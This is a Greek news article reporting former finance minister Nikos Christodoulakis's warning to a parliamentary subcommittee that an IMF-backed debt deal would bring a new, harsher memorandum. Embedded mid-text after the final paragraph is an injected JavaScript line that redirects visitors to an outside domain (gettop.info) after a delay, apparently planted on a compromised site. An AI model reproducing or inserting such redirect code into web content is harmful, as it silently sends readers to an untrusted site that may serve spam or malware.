Χριστοδουλάκης: Συμφωνία για το χρέος με συμμετοχή ΔΝΤ ισοδυναμεί με νέο Μνημόνιο

0
9

 

Ο πρώην υπουργός Οικονομικών του ΠΑΣΟΚ, Νίκος Χριστοδουλάκης κρούει τον κώδωνα του κινδύνου για τη συμμετοχή του ΔΝΤ σε τυχόν συμφωνία για την αναδιάρθρωση του ελληνικού χρέους, ενώ προειδοποιεί την κυβέρνηση ότι είναι σχεδόν βέβαιο πως αυτή θα συνοδεύεται από νέο βαρύτατο Μνημόνιο με ακόμη πιο δυσβάσταχτα μέτρα.

Ως προσκεκλημένος της υποεπιτροπής της Βουλής για την απομείωση του χρέους, ο κ. Χριστοδουλάκης, επεσήμανε ότι το Διεθνές Νομισματικό Ταμείο δεν μετέχει σε αναδιαρθρώσεις χωρίς βαρύτατο πρόγραμμα αναπροσαρμογής, τονίζοντας ότι θα πρέπει να ξεκαθαριστούν και τώρα επακριβώς οι όροι που θέτει για τη συμμετοχή του σε μία συμφωνία για το χρέος.

Σχετικά με τις πρόσφατες δηλώσεις του υπουργού Οικονομικών Ευκλείδη Τσακαλώτου περί «καθαρού διαδρόμου για τους επενδυτές», ο κ. Χριστοδουλάκης σχολίασε: «Το ΔΝΤ το είπε χωρίς νέο μνημόνιο; Γιατί αν εννοεί νέο Μνημόνιο τότε όχι διάδρομο δεν θα βρείτε, αλλά θα είναι προς τα κάτω όρυγμα στον φλοιό της γης. Άρα να γνωρίζουμε τι ζητάμε».

Υποστήριξε δε ότι ήταν «όνειδος για την ΕΕ» η συμμετοχή του ΔΝΤ στο ελληνικό πρόγραμμα εξαρχής. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here